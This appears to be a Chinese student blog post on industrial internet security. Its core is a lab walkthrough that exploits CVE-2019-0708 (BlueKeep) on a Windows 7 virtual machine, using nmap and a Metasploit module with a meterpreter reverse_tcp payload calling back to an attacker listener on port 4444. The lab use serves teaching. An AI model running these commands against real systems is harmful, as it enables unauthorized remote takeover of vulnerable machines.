工业互联网安全

已于 2023-12-11 16:48:35 修改
阅读量332 收藏 6
点赞数 9
文章标签: 安全
于 2023-12-11 16:29:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CSDN6047_/article/details/134929038
版权

目录

一、什么是工业互联网安全,工业互联网安全问题有哪些

1.工业互联网的概念

二、项目:利用windows 7 cve-2019-0708漏洞

说明:

三、环境准备:

1.开启Kali虚拟机和win7靶机

2.在win7虚拟机的命令窗口输入:netstat -an,查看打开的端口:

3.若3389没打开,可以右键计算机,选择属性

4.选择远程设置

5.选择允许远程连接

四、利用windows 7 cve-2019-0708漏洞案例

1.kali中使用nmap扫描目标机器端口确认是否开启3389端口:

2.确认开启后启动msfconsole

3. 搜索漏洞:

4.使用攻击功能,也就是第二个模块:

5.设置目标:

6.设置payload:

7.设置攻击机:

8.输入:show targets,显示可以选择的靶机的架构

9.用于vm是15.5.1,所以可以选择target 3-5

10.选择target 3,进行尝试:

11.进行攻击,运行:run

12.假如可以建立连接,输入:

五、运行远程桌面模块

13.另开一个kali终端,输入:

六、总结

一、什么是工业互联网安全,工业互联网安全问题有哪些

1.工业互联网的概念

工业互联网(Industrial Internet)是新一代信息通信技术与工业经济深度融合的新型基础设施、应用模式和工业生态,通过对人、机、物、系统等的全面连接,构建起覆盖全产业链、全价值链的全新制造和服务体系,为工业乃至产业数字化、网络化、智能化发展提供了实现途径,是第四次工业革命的重要基石。

(1).工业互联网(Industrial Internet)是全球工业系统与高级计算、分析、感应技术以及互联网连接融合的一种结果,可以通过智能机器间的连接并最终将人机连接,结合软件和大数据分析,重构全球工业、激发生产力,让世界更美好、更快速、更安全、更清洁且更经济。 而工业互联网安全就是指从构建工业互联网安全保障体系考虑,工业互联网安全应包括五大重点,即设备安全、网络安全、控制安全、应用安全和数据安全。

(2).工业互联网是实现智能制造的核心,是互联网和新一代信息技术与全球工业系统全方位深度融合集成所形成的产业和应用生态,是工业智能化发展的关键综合信息基础设施。随着工业互联网从信息时代到智能时代的转变,“信息网络支撑的互联智能”开始向“知识驱动的自主智能”发展,这个过程中的关键环节之一就是工业互联网安全。

(3).工业互联网安全:挑战与应对策略

随着工业互联网的快速发展,工业互联网安全问题日益凸显。工业互联网是工业4.0的核心,涵盖了工业生产、管理、运营等各个环节,但同时也面临着来自各方面的安全威胁。因此,如何保障工业互联网的安全,已成为当前待解决的问题。

二、项目:利用windows 7 cve-2019-0708漏洞

说明:

该漏洞存在于Windows系统的Remote Desktop Services(远程桌面服务)(端口3389)中,未经身份验证的攻击者可以通过发送特殊构造的数据包触发漏洞,可能导致远程无需用户验证控制系统。这意味着该漏洞可以通过网络蠕虫的方式被利用,利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。

三、环境准备:

1.开启Kali虚拟机和win7靶机

2.在win7虚拟机的命令窗口输入:netstat -an,查看打开的端口:

3.若3389没打开,可以右键计算机,选择属性

4.选择远程设置

5.选择允许远程连接

四、利用windows 7 cve-2019-0708漏洞案例

1.kali中使用nmap扫描目标机器端口确认是否开启3389端口:

nmap 192.168.11.133(win7IP)

2.确认开启后启动msfconsole

3. 搜索漏洞:

search 0708

#前两个模块,一个是扫描功能,一个是攻击功能。

4.使用攻击功能,也就是第二个模块:

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

5.设置目标:

set rhost 被攻击ip     #设置win7ip
set rport 3389 

6.设置payload

set payload windows/x64/meterpreter/reverse_tcp   #设置64位的payload如果是32位机器则不用加x64

7.设置攻击机:

set lhost 攻击者ip     #设置kali的ip 

set lport 4444           #设置攻击者的监听端口(端口可以随意更改)

8.输入:show targets,显示可以选择的靶机的架构

9.用于vm是15.5.1,所以可以选择target 3-5

10.选择target 3,进行尝试:

set target 3

11.进行攻击,运行:run

12.假如可以建立连接,输入:

五、运行远程桌面模块

13.另开一个kali终端,输入:

rdesktop win7靶机IP

六、总结

     工业互联网的安全问题需要贯穿整个软件工程过程中进行设计和考虑,不能到了系统最后上线或投产阶段再被动考虑安全问题。在工业互联网建设中,需要保证业务功能的安全,更要保护企业隐私数据的安全。同时关注可靠性、完整性、可用性等。安全要融入到整个软件生命周期内,将传统意识上被动安全防护转化为主动进行安全需求分析、安全设计、安全编码和安全测试。工业互联网的安全保障体系建设情况因行业信息化和自动化程度的不同而各不相同,信息化、自动化程度越高的行业,开放程度也相对较高,面临的安全风险随之增大,对安全也更加重视,安全保障体系建设相对需要更加完善。工业互联网的安全保障框架需要从以下几个方面进行考虑:网络安全、数据安全、设备安全、应用安全、人员安全等。同时,需要建立完善的安全管理体系,包括安全策略、安全组织、安全技术、安全管理等方面。

22计算机网络技术1班潘泽恒
关注
  • 9
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
工业互联网安全下的数据分类分级研究
qq_61890005的博客
12-02 1142
摘要:随着工业经济的快速发展,工业数据安全性日益凸显,如何做好工业数据的整体治理、安全管理、价值挖掘、共享流通等工作,是亟待解决的重要问题,而工业数据分类分级是以上工作的基础,因此做好分类分级工作是一项极其重要的任务。基于此,研究了工业数据分类分级的现状,梳理了工业数据分类分级的总体要求、一般流程和实践情况,为工业数据分类分级工作的开展提供了一定的思路和方法,助力工业数据应用融合发展。内容目录:1 工业数据分类分级背景2 工业数据分类分级指导3 结 语近年来,我国工业经济发展势头良好,新一代信息技术与制
工业互联网安全标准体系(2021年新修订版).pdf
12-13
工业互联网安全标准体系(2021年新修订版)
2021年江西工业互联网安全技术技能大赛线下决赛部分Writeup
末初的CSDN博客
10-19 1649
文章目录智能制造风力发电CTF火力发电厂智慧城市 智能制造 签到题,直接查找http流量包中的关键字 http contains "flag" flag{jx2021} 风力发电CTF 题目描述 风力发电机平时正常转速2500转每分钟,但有一天风力发电机转速异常,请从流量包中找出异常的转速流量之和。 TCP总共14个流,其中有几个流有一些十六进制字符数据,转换字符没发现什么线索,也没发现什么规律,然后用Hex 转储发现第一个流的数据存在规律 WireShark不方便做查找,复制到Sublime发
2021年中国工业互联网安全大赛
苦行僧的妖孽日常
10-16 5329
2021年10月14日,山东·青岛,中国工业互联网安全大赛核能行业赛道,上午9:00开始,下午5:30结束。本人与另外2名同事组队参加比赛,经过8个半小时的角逐,最终获得三等奖。这个系列是本次CTF比赛复盘。
2021年江西工业互联网安全技术技能大赛线上初赛Writeup
末初的CSDN博客
10-05 3025
文章目录协议分析S7协议分析工控流量分析异常流量分析应急处置图片的秘密现场数据采集应急恢复文件分析组态编程探索组态密码恶意程序恶意app分析恶意程序分析固件分析丢失的密码工业固件分析 协议分析 S7协议分析 0300002402f080320100000003000e00050501120a100200010000830000000004000801。 请解读以上协议内容,并准确的拿到此报文返回值,flag即为返回值。提交格式:flag{xxx}。 写入报文的数据分析 03 00
国外工业互联网安全现状分析(政策;标准;厂商;产品)
hhhhh109p的博客
07-20 4139
国外工业互联网安全分析,包括内容:标准;政策;厂商;产品
工业互联网安全防护
2301_77002907的博客
12-23 856
在工业现场网络重要控制系统的工程师站、操作员站和历史站部署运维管控系统,实现对外部存储器、键盘和鼠标等使用USB接口设备的识别,对外部存储器的使用进行严格控制。只有当我们真正意识到安全的重要性,并付诸实践,才能确保工业互联网安全运行,为企业和社会创造更大的价值。因此,定期的安全培训和意识提升活动是非常必要的。在工业互联网环境中,物理安全和网络安全是相互交织的,一个安全事件可能会影响设备和人员的安全工业互联网连接的各种设备和系统来自不同的制造商,每种设备和系统都有其独特的安全需求和挑战。
【CTF WriteUp】2020全国工业互联网安全技术技能大赛密码题(Crypto)wp
qq_45603443的博客
10-24 4497
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 护网杯2020wp一、题目 2E二、根据题目给脚本推出EXP如下:1.Task.py2. print(key)3. print(1)4. mt.py得到flag![在这里插入图片描述](https://img-blog.csdnimg.cn/20201024231116648.jpg#pic_center) 一、题目 2E 二、根据题目给脚本推出EXP如下: 1.Task.py 代码如下(示例): import random from
工业互联网与工控安全
悦分享
07-01 4359
1、行业特性传统信息系统旨在利用计算机、互联网技术实现数据处理与信息共享,而工业控制系统旨在利用计算机、互联网、微电子以及电气等技术,使工厂的生产和制造过程更加自动化、效率化、精确化,并具有可控性及可视性,它强调的是工业自动化过程及相关设备的智能控制、监测与管理。2、工业控制设备传统信息系统是通过互联网协议组成的计算机网络;而工业控制系统是PLC、RTU、DCS、SCADA等工业控制设备及系统组成的多层次网络。3、工业控制操作系统传统信息系统通用使用的操作系统,如Windows、UNIX、Linux等,防护
工业互联网安全需要“融合”发展
产品是以创造用户价值为工具
08-26 1195
工业互联网安全需要“融合”发展
工业互联网安全标准体系(2021年)》.pdf
10-12
工业互联网安全标准体系(2021年) 《工业互联网安全标准体系(2021年)》是工业互联网安全标准的总体框架,旨在为工业互联网企业提供系统、分类、分级的安全防护指南。该标准体系涵盖了工业互联网安全的方方面面,...
工业互联网安全框架
05-28
工业互联网安全框架,工业互联网安全框架是构建工业互联网安全体系的重要指南,是业界专家在 工业互联网安全防护方面达成的共识,旨在为工业互联网相关企业应对日益增长 的安全威胁、部署安全防护措施提供指导,提升...
中国工业互联网安全态势报告(2020年).pdf
04-24
中国工业互联网安全态势报告(2020年).pdf 中国工业互联网安全态势报告(2020年).pdf 中国工业互联网安全态势报告(2020年).pdf 中国工业互联网安全态势报告(2020年).pdf 中国工业互联网安全态势报告(2020年)...
赛博地球杯工业互联网安全大赛wp1
08-03
工业互联网安全大赛 WP1 解析 本文将对赛博地球杯工业互联网安全大赛 WP1 进行详细解析,涵盖网络协议、PHP 和 SQL 等相关知识点。 一、网络协议 在 WP1 中,我们可以看到 ping 命令的使用,ping 命令是一种网络...
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 927
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
《软件定义安全》之八:软件定义安全案例
最新发布
大龄IT民工
06-13 1086
Embrane是一家虚拟设备提供商,由Cisco公司前员工创立,该公司致力于实现网络功能实体的软件化,旨在研发出多服务、分布式软件架构的网络服务产品。它于2015年4月被Cisco公司收购。Embrane的软件定义架构称为Heleos,利用虚拟通信设备代替原有基于专有硬件平台的设备,通过一个集中的控制台对虚拟设备进行管理和控制。Heleos与原来的应用交付网络(ADN)产品较为接近,是基于软件的L4~L7虚拟设备,包括负载均衡产品、防火墙、VPN产品和SSLOffload Engine。
NTFS安全权限
2302_80097039的博客
06-12 526
NTFS权限是基于。
《软件定义安全》之三:用软件定义的理念做安全
大龄IT民工
06-08 838
中心化的智能控制系统网络控制器就能根据上下文场景,计算网络或安全策略,快速、有效地调度网络中的流量。全局和实时流量视图SDN控制器具有全局网络实时的流量信息,这些信息在很多防护场景中非常有用。例如,在DDoS检测时,可获取物理网络处的硬件交换机的sFlow或OpenFlow流信息,然后根据数据包流的统计特征进行判断,确认是否存在恶意攻击。基于全局网络设备提供的流量信息,可构建基于流量的实时和历史知识库,进而运行时对任意访问进行分析,确认其在历史知识库中是否存在相似的模式。
工业互联网安全misc wp
10-27
工业互联网安全是指保护工业互联网系统免受各类恶意攻击和数据泄露的安全措施。随着工业互联网的快速发展,工业互联网安全问题日益突出,需要采取有效措施确保系统的可靠性和稳定性。 首先,工业互联网安全需要进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值